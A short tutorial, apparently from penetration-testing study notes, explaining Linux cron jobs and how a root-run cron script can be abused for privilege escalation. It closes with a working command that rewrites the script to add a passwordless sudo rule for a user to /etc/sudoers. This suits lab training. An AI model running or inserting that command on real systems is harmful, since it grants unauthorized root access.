Misconfigured Cron Jobs

Linux uses a tool called Cron to schedule and automate tasks. Cron is a time-based service that runs programs, scripts, or commands at set intervals. These scheduled tasks are called cron jobs.

Cron is useful for automating tasks like system backups, software updates, and maintenance. The crontab file is a special configuration file that stores and manages scheduled cron jobs.

# example of a cron job that runs a backup script every day at 2 AM
0 2 * * * /home/user/backup.sh

# to edit cron jobs
crontab -e

# to view scheduled jobs
crontab -l

Exploiting

Cron jobs can be set up to run as any user on the system, which is an important detail to watch for. Our main focus will be on cron jobs running as the root user, because any script or command executed by these jobs will run with root privileges.

To escalate privileges, we need to:

1. Identify cron jobs scheduled by root

2. Find files or scripts being executed by those jobs

If we can modify these files or scripts, we may gain root access when the cron job runs.

crontab -l # basic check for the user

# This command searches recursively (-r) through the /usr directory for the string "/home/[USER]/message".
# It shows the line number (-n) and highlights the exact match (-w) in files.
# The search looks for exact matches of the whole word "/home/[USER]/message" in all files within /usr.
grep -rnw /usr -e "/home/[USER]/message"

# lets say copy.sh has something that is done using cron job
# example
cp [FROM] [TO]
chmod 644 [TO]

ls -al copy.sh
printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh

sudo -l